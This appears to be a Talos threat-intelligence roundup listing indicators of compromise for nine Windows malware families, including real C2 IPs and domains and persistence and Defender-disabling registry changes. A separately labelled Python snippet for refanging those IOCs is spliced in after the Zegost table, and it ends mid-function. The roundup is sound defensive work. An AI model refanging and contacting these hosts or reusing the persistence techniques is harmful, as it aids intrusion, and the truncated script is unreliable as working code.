Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 21 and May 28. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name  Type  Description
Win.Malware.Dridex-9863247-1  Malware  Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Ircbot.Ircbot-9863290-0  Ircbot  Ircbot, also known as Eldorado, is known for injecting into processes, spreading to removable media, and gaining execution via Autorun.inf files.
Win.Packed.Tofsee-9863322-1  Packed  Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the size of the botnet.
Win.Packed.Zbot-9864764-0  Packed  Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
Win.Packed.Razy-9863698-0  Packed  Razy is often a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data before sending it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Packed.ZeroAccess-9863627-1  Packed  ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine, and serves as a platform for conducting click-fraud campaigns.
Win.Dropper.NetWire-9863651-1  Dropper  NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Nymaim-9863762-0  Malware  Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to for additional payloads.
Win.Trojan.Zegost-9863903-0  Trojan  Zegost is a remote access trojan designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. Zegost appears to be derived from Gh0stRAT, a well-known remote access trojan whose source code was leaked, significantly lowering the barrier to entry for actors looking to modify and reuse the code in new attacks.

Threat Breakdown

Win.Malware.Dridex-9863247-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Mutexes  Occurrences
{ac5b642b-c225-7367-a847-11bdf3a5e67c} 22
{24d07012-9955-711c-e323-1079ebcbe1f4} 22
IP Addresses contacted by malware. Does not indicate maliciousness  Occurrences
74[.]125[.]4[.]217 1
Files and/or directories created  Occurrences
\REGISTRY\MACHINE\SOFTWARE\Classes\AllFilesystemObjects 2
%APPDATA%\Microsoft\Windows\STARTM~1\Programs\Startup\Ymxwdsyzafokif.lnk 2
%APPDATA%\Microsoft\Windows\STARTM~1\Programs\Startup\Umxvfminqnvbr.lnk 2
%APPDATA%\Microsoft\Windows\STARTM~1\Programs\Startup\Yzhamaqvxq.lnk 2
%APPDATA%\Microsoft\Windows\STARTM~1\Programs\Startup\Fhpzkfeavtvngv.lnk 2
%APPDATA%\Adobe\Acrobat\9.0\Security\DtUO1m\DUI70.dll 1
%APPDATA%\Microsoft\Templates\LiveContent\aJPnlzFsS\XmlLite.dll 1
%APPDATA%\Adobe\Acrobat\9.0\Security\DtUO1m\phoneactivate.exe 1
%APPDATA%\Microsoft\Templates\LiveContent\aJPnlzFsS\wsqmcons.exe 1
%APPDATA%\Microsoft\Publisher Building Blocks\XO\MAGNIFICATION.dll 1
%APPDATA%\Microsoft\Publisher Building Blocks\XO\Magnify.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\sEKGfumvF\WTSAPI32.dll 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\sEKGfumvF\rdpclip.exe 1
%LOCALAPPDATA%\4jn\UxTheme.dll 1
%LOCALAPPDATA%\4jn\msdt.exe 1
%LOCALAPPDATA%\7lhz042u\BitLockerWizardElev.exe 1
%LOCALAPPDATA%\7lhz042u\FVEWIZ.dll 1
%LOCALAPPDATA%\lUO4ex2Ju\MFC42u.dll 1
%LOCALAPPDATA%\lUO4ex2Ju\eudcedit.exe 1
%APPDATA%\HNC\User\HCell\Eq\BitLockerWizardElev.exe 1
%APPDATA%\HNC\User\HCell\Eq\FVEWIZ.dll 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\v2JJQd9hJ\UxTheme.dll 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Accessories\v2JJQd9hJ\msdt.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\HaULC\MFC42u.dll 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\HaULC\eudcedit.exe 1

*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product  Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK


Win.Ircbot.Ircbot-9863290-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 32 samples
Registry Keys  Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: MSN)  32
Mutexes  Occurrences
fghh8aeg0 12
uNk 9
<random, matching [a-zA-Z0-9]{5,9}> 8
uNke 1
Global\13e539c1-b961-11eb-b5f8-00501e3ae7b6 1
zc 1
ghuy6gh67t 1
IP Addresses contacted by malware. Does not indicate maliciousness  Occurrences
91[.]134[.]203[.]49 3
175[.]126[.]123[.]219 1
70[.]39[.]99[.]203 1
95[.]173[.]180[.]252 1
Domain Names contacted by malware. Does not indicate maliciousness  Occurrences

*See JSON for more IOCs

Files and/or directories created  Occurrences
\autorun.inf 30
E:\autorun.inf 30
E:\RECYCLER 29
\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\Desktop.ini 28
E:\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213 28
E:\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\Desktop.ini 28
\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\autorunme.exe 26
E:\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\autorunme.exe 26
%SystemRoot%\BINARy.exe 10
%SystemRoot%\wkssvr.exe 5
%SystemRoot%\dlvdr32.exe 2
%SystemRoot%\mservice.exe 2
%SystemRoot%\Ryan.exe 2
%SystemRoot%\services.exe 1
%APPDATA%\Microsoft\Protect\S-1-5-21-1160359183-2529320614-3255788068-500\Preferred 1
E:\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213 1
E:\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213\Desktop.ini 1
E:\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213\autorunme.exe 1
\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213\Desktop.ini 1
\RECYCLER\S-1-6-21-2434476511-1644491937-600003330-1213\autorunme.exe 1
%SystemRoot%\t07a.exe 1
%SystemRoot%\sbservices.exe 1
E:\RECYCLERe 1
E:\RECYCLERe\S-1-6-21-2434476501-1644491937-600003330-1213 1
E:\RECYCLERe\S-1-6-21-2434476501-1644491937-600003330-1213\Desktope.ini 1

*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product  Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK


Win.Packed.Tofsee-9863322-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 35 samples
Registry Keys  Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Type)  35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Start)  35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ErrorControl)  35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: DisplayName)  35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: WOW64)  35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ObjectName)  35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Description)  35
<HKU>\.DEFAULT\CONTROL PANEL\BUSES  35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>  35
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config2)  35
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config0)  35
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config1)  35
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ImagePath)  20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\kdrxwekz)  4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\wpdjiqwl)  3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\unbhgouj)  2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\haoutbhw)  2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\nguazhnc)  2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\athnmuap)  2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\zsgmltzo)  2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\buionvbq)  2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\lesyxfla)  2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\rkyedlrg)  2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\mftzygmb)  2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\ohvbaiod)  2
IP Addresses contacted by malware. Does not indicate maliciousness  Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness  Occurrences

*See JSON for more IOCs

Files and/or directories created  Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 35
%SystemRoot%\SysWOW64\config\systemprofile:.repos 35
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 35
%TEMP%\<random, matching '[a-z]{8}'>.exe 33
%System32%\config\systemprofile:.repos 25
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 25
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 8

File Hashes

*See JSON for more IOCs

Coverage

Product  Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK


Win.Packed.Zbot-9864764-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys  Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST  9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: mssend)  9
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY (Value Name: CleanCookies)  2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 (Value Name: CheckSetting)  2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 (Value Name: CheckSetting)  2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 (Value Name: CheckSetting)  2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 (Value Name: CheckSetting)  2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 (Value Name: CheckSetting)  2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST (Value Name: C:\Users\Administrator\AppData\Roaming\xrc3u3qyysxakx1bdrcfxnbvxqxzzzhi2\svcnost.exe)  1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST (Value Name: C:\Users\Administrator\AppData\Roaming\xipfdhpxs2y1uidtt2cf1dp1nsxhfhzv2\svcnost.exe)  1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: {45EBDE09-B8AE-3DDD-DDFF-11B333B2A8E0})  1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: {900ABDDA-74EE-F199-7D2F-060E7E8C2398})  1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST (Value Name: C:\Users\Administrator\AppData\Roaming\x1vkixykjptuvcan2w3kxcmncbdke2up2\svcnost.exe)  1
<HKCU>\SOFTWARE\MICROSOFT\FEDUO (Value Name: Mykefat)  1
<HKCU>\SOFTWARE\MICROSOFT\OCLU (Value Name: Evsauc)  1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST (Value Name: C:\Users\Administrator\AppData\Roaming\x1tj3icmbo33xthrtlk2bschp2skmlsa2\svcnost.exe)  1
<HKCU>\SOFTWARE\MICROSOFT\FEDUO  1
<HKCU>\SOFTWARE\MICROSOFT\OCLU  1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST (Value Name: C:\Users\Administrator\AppData\Roaming\xbzmfecljkddemubtibatcqva3rwrkya2\svcnost.exe)  1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST (Value Name: C:\Users\Administrator\AppData\Roaming\xeelzmrnnktfqyecuwakgjpxewhhvob32\svcnost.exe)  1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST (Value Name: C:\Users\Administrator\AppData\Roaming\xdcjvf3kdsd3rjmtr2ebmtycyshibawe2\svcnost.exe)  1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST (Value Name: C:\Users\Administrator\AppData\Roaming\x2ipsjhqzrqeslkuo1nvhob3hhrpkrez2\svcnost.exe)  1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST (Value Name: C:\Users\Administrator\AppData\Roaming\xoeexpxwjohheodlyfxud2d12wc32usz2\svcnost.exe)  1
Mutexes  Occurrences
GLOBAL\{<random GUID>} 2
Local\{<random GUID>} 2
IP Addresses contacted by malware. Does not indicate maliciousness  Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness  Occurrences

*See JSON for more IOCs

Files and/or directories created  Occurrences
%APPDATA%\ntuser.dat 9
%APPDATA%\xrc3u3qyysxakx1bdrcfxnbvxqxzzzhi 1
%APPDATA%\xipfdhpxs2y1uidtt2cf1dp1nsxhfhzv 1
%APPDATA%\Uwibuw\uvwij.ecd 1
%APPDATA%\x1vkixykjptuvcan2w3kxcmncbdke2up 1
%APPDATA%\Inac\ecny.mur 1
%TEMP%\tmp908c9f54.bat 1
%APPDATA%\Ikjeva 1
%TEMP%\tmp296bf3d2.bat 1
%APPDATA%\Ikjeva\iruj.exe 1
%APPDATA%\x1tj3icmbo33xthrtlk2bschp2skmlsa 1
%APPDATA%\Inac 1
%APPDATA%\Uwibuw 1
%APPDATA%\Qeynre 1
%APPDATA%\Qeynre\jeuz.exe 1
%APPDATA%\xbzmfecljkddemubtibatcqva3rwrkya 1
%APPDATA%\xeelzmrnnktfqyecuwakgjpxewhhvob3 1
%APPDATA%\xdcjvf3kdsd3rjmtr2ebmtycyshibawe 1
%APPDATA%\x2ipsjhqzrqeslkuo1nvhob3hhrpkrez 1
%APPDATA%\xoeexpxwjohheodlyfxud2d12wc32usz 1

File Hashes

*See JSON for more IOCs

Coverage

Product  Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK


Win.Packed.Razy-9863698-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 33 samples
Mutexes  Occurrences
<random, matching [A-Z0-9]{10}> 33
IP Addresses contacted by malware. Does not indicate maliciousness  Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness  Occurrences

*See JSON for more IOCs

Files and/or directories created  Occurrences
%System32%\Tasks\Google_Trk_Updater 33
<malware cwd>\old_<malware exe name> (copy) 23

File Hashes

*See JSON for more IOCs

Coverage

Product  Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK


Win.Packed.ZeroAccess-9863627-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys  Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: Start)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: DeleteFlag)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: Start)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS (Value Name: Start)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: Start)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC (Value Name: Start)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS (Value Name: DeleteFlag)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: DeleteFlag)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: DeleteFlag)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER (Value Name: Start)  23
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32 (Value Name: ThreadingModel)  23
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32  23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Windows Defender)  23
<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: Type)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: ErrorControl)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS (Value Name: Type)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS (Value Name: ErrorControl)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC (Value Name: Type)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC (Value Name: ErrorControl)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC (Value Name: DeleteFlag)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: Type)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: ErrorControl)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: Type)  23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: ErrorControl)  23
IP Addresses contacted by malware. Does not indicate maliciousness  Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness  Occurrences
j[.]maxmind[.]com 23
Files and/or directories created  Occurrences
%System32%\LogFiles\Scm\e22a8667-f75b-4ba9-ba46-067ed4429de8 23
\$Recycle.Bin\S-1-5-18 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@ 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@ 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n 23
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\@ 23
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\n 23

File Hashes

*See JSON for more IOCs

Coverage

Product  Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK


Win.Dropper.NetWire-9863651-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 46 samples
Mutexes  Occurrences
- 46
Domain Names contacted by malware. Does not indicate maliciousness  Occurrences
pinojesu[.]mooo[.]com 46
Files and/or directories created  Occurrences
\TEMP\.Identifier 46
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\cdce.vbe 46
%APPDATA%\dsder 46
%APPDATA%\dsder\cdce.exe 46

File Hashes

*See JSON for more IOCs

Coverage

Product  Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK


Win.Malware.Nymaim-9863762-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys  Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK  23
<HKCU>\SOFTWARE\MICROSOFT\GOCFK (Value Name: mbijg)  23
Mutexes  Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness  Occurrences

*See JSON for more IOCs

Files and/or directories created  Occurrences
%ProgramData%\ph 23
%ProgramData%\ph\fktiipx.ftf 23
%TEMP%\gocf.ksv 23
%ProgramData%\<random, matching '[a-z0-9]{3,7}'> 23
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 23
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'> 23
%ProgramData%\jzk\icolry.ylg 20
%TEMP%\qnvgtx.eww 20
%TEMP%\ylw.vrd 1
\Documents and Settings\All Users\am\oatuqzx.bpc 1

File Hashes

*See JSON for more IOCs

Coverage

Product  Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK


Win.Trojan.Zegost-9863903-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys    Occurrences
<HKLM>\SYSTEM\GROUP\GROUP
Value Name: Group
12
<HKLM>\SYSTEM\GROUP 12
<HKLM>\SYSTEM\GROUP\GROUP 12
Mutexes    Occurrences
V1dXHmpoaVhXV1ceQ19dIA==ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 3
EREQHhIUKR4SERMeFhYgERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 2
ERIVHigUHhcpHhEoFSA=ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
alhBXkdYQV8VEhAeQ14gERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
ERATHhQQHhEQEh4RFSkgERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
UVETKBATERcUHkVZQ1AeXkVUIA==ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
EREoHhESEx4RERYeERYSIA==VyhcKR5GExMSEh5eRVQgERIXHhAeEB4RIA== 1
EREoHhEpEx4SEBUeESkWIA==ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
ERATHhITEB4REhEeEhATIA==ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
110[.]249[.]213[.]66 2
125[.]84[.]79[.]185 1
103[.]40[.]102[.]159 1
118[.]193[.]205[.]196 1
103[.]230[.]121[.]203 1
125[.]32[.]170[.]209 1
118[.]123[.]116[.]162 1
Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
www[.]zxyhwww[.]com 3
zhanghao520[.]cn 1
qq3803174[.]eicp[.]net 1
w8l9[.]f3322[.]net 1
Files and/or directories created    Occurrences
%APPDATA%\Microsoft\Windows\Start Menu\Xnv.url 11
%APPDATA%\Microsoft\Windows\Start Menu\Xnz.url 11
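The network IOCs above are printed in defanged form (`110[.]249[.]213[.]66`), so they cannot be grepped for directly. The following script is an added example, not part of the Talos post: it refangs a handful of the Zegost indicators listed above and searches them in a few constructed DNS/connection log lines. The log lines and the key=value format are assumptions for illustration; as the post says, a hit is a lead for further hunting, not a verdict.

```python
"""Refang the bracketed IOCs from the Zegost tables and search sample logs.

Added example, not part of the Talos post. The log lines below are constructed.
"""
import re
from typing import List, Tuple

# Copied from the Zegost IP/domain tables above, in Talos' defanged notation.
DEFANGED_IOCS = [
    "110[.]249[.]213[.]66",
    "125[.]84[.]79[.]185",
    "www[.]zxyhwww[.]com",
    "zhanghao520[.]cn",
    "w8l9[.]f3322[.]net",
]


def refang(ioc: str) -> str:
    """Undo the common [.] / (.) / hxxp defanging so the value can be matched."""
    return (ioc.replace("[.]", ".").replace("(.)", ".")
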